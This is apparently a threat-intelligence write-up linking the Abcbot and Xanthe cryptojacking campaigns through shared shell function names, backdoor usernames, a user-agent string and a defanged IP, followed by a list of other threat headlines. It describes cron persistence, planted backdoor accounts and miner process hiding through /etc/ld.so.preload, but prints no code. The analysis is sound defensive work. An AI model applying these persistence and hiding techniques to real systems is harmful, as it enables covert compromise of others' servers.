Abcbot – An Evolution of Xanthe

There are a few infrastructure overlaps. For example, the following rule allowing ingress traffic from 64[.]225[.]46[.]44 in the Xanthe sample also appears in the Abcbot sample.
Whilst it’s common to see cryptojacking malware authors simply copy code from each other, there are a number of other similarities discussed below which make a direct link in ownership between the Xanthe and Abcbot campaigns more likely.

In the original report from Cisco’s Talos security research team, researchers commented on the coding style of the shell scripts being analysed – in particular, functions being declared at the top of the file and then invoked in some of the later lines.
Talos researchers suggested that this likely aids testing of new iterations, with functionality enabled/disabled through commenting of the lines responsible for function invocation.
Both the Abcbot and Xanthe samples we compared follow this coding style.

Linking these two samples based on code style similarities alone would be tenuous, at best. However, if we look at some of the function names themselves, correlation becomes apparent.
Several of the functions have “go” appended to the end of the function name and some functions have identical names. The following names appear in both samples:

nameservercheck
croncheckgo
checkrc
iptableschecker
filerungo

Comparing the above, we can immediately see that the Abcbot version of the nameservercheck function is significantly larger than the Xanthe counterpart.
The Xanthe sample we analyzed is older than the Abcbot sample by over a year (according to VirusTotal submissions).
This could indicate that the Abcbot version of the function has been iterated on several times, with new functionality added at each iteration.

The croncheckgo function in both samples is responsible for achieving persistence via the cron scheduling utility common to most Linux distributions.
Both samples include a TODO comment from the author, regarding adding logic to determine whether cron is running on different Linux distributions – a note to add logic presumably to deal with this.
The service command is then used to start the cron daemon and cron itself, guaranteeing that any modifications made to the crontab would be honoured by the scheduling utility.
The cron entries consist of curl commands with specified user-agent strings.
The purpose of this is covered in Talos’ research but if we look at the strings themselves, we can see that fczyo-cron is used in both samples, with different version numbers appended to each. Incidentally, one of the payloads downloaded by Xanthe is also named “fczyo”.

Reuse of a unique string such as this does seem more than coincidental and suggests that the code running on servers from both the Xanthe and Abcbot campaigns expects this string to be present in the user-agent.

Talos researchers noted that the method of propagation utilized by Xanthe was via enumeration of the known_hosts file, allowing the malware to spread to new hosts based on hosts the current host had previously connected to.

Our research of Abcbot showed examples of code used to add four malicious users to the compromised host, effectively creating four backdoors for the actor to utilize. The malicious usernames in question were:

logger
sysall
system
autoupdater
In the Xanthe sample, users with the same usernames are added to the system (if they do not already exist).
Similarly, both Abcbot and Xanthe search for and remove users that we assumed were from competing campaigns.

As researchers at Talos reported, perhaps one of the defining features of Xanthe was the use of an open source process hiding library named libprocesshider.so. This was used to hide the process created by the XMRig miner by inserting the path to the library into the /etc/ld.so.preload file.

We did not see evidence of this process hiding technique in the Abcbot sample we analyzed. We did, however, see some code that references use of the technique in previous campaigns (such as Xanthe) in the function kill_miner_proc; a function responsible for clearing artifacts of miners from competing or prior campaigns.

Sign Up For Threat Alerts

Loading...
Threats Icon

May 25, 2022

Twisted Panda: Chinese APT espionage operation against...

Check Point Research (CPR) details a targeted campaign that has been using sanctions-related baits to...

Threats Icon

May 23, 2022

A deeper look at XorDdos malware targeting...

In the last six months, we observed a 254% increase in activity from a Linux...

Threats Icon

May 22, 2022

Ransomware Spotlight RansomEXX

RansomEXX is another ransomware variant that runs on a ransomware-as-a-service (RaaS) model and has been...

Threats Icon

May 19, 2022

Malicious Compiled HTML Help File Delivering Agent...

PaloAlto Unit42 discovered a malicious HTML help file delivering Agent Tesla. The attack is interesting...

Threats Icon

May 16, 2022

BPFdoor: Stealthy Linux malware bypasses firewalls for...

A recently discovered backdoor malware called BPFdoor has been stealthily targeting Linux and Solaris systems...

Threats Icon

May 16, 2022

Onyx ransomware destroys files instead of encrypting...

A new Onyx ransomware operation is destroying files larger than 2MB instead of encrypting them,...

Threats Icon

May 15, 2022

Researchers Warn of Nerbian RAT Targeting Entities...

A previously undocumented remote access trojan (RAT) written in the Go programming language has been...

Threats Icon

May 12, 2022

Bitter APT targets Bangladesh

Cisco Talos has observed an ongoing malicious campaign from the Bitter APT group that appears...

Threats Icon

May 11, 2022

Experts Sound Alarm on DCRat Backdoor Being...

Cybersecurity researchers have shed light on an actively maintained remote access trojan called DCRat (aka...

Threats Icon

May 11, 2022

The Lotus Panda is awake, again

In this attack analyzed by C25, the Chinese APT used a spear phishing email to...

Threats Icon

May 09, 2022

Moshen Dragon – Abusing Security Software to...

SentinelLabs recently uncovered a cluster of activity targeting the telecommunication sector in Central Asia, utilizing...

Threats Icon

May 09, 2022

AvosLocker Ransomware Abuses Driver File to Disable...

TrendMicro found samples of AvosLocker ransomware that makes use of a legitimate driver file to...

Threats Icon

May 02, 2022

LockBit Ransomware Side-loads Cobalt Strike Beacon

The VMware command line utility VMwareXferlogs.exe used for data transfer to and from VMX logs...

Threats Icon

May 02, 2022

Emotet Returns With New TTPs And Delivers...

The epoch4 Emotet server started spamming and delivering zipped .lnk files to its victims through...

Threats Icon

Apr 28, 2022

BRONZE PRESIDENT

Government-sponsored threat actors collect intelligence to benefit their country, and changes to the political landscape...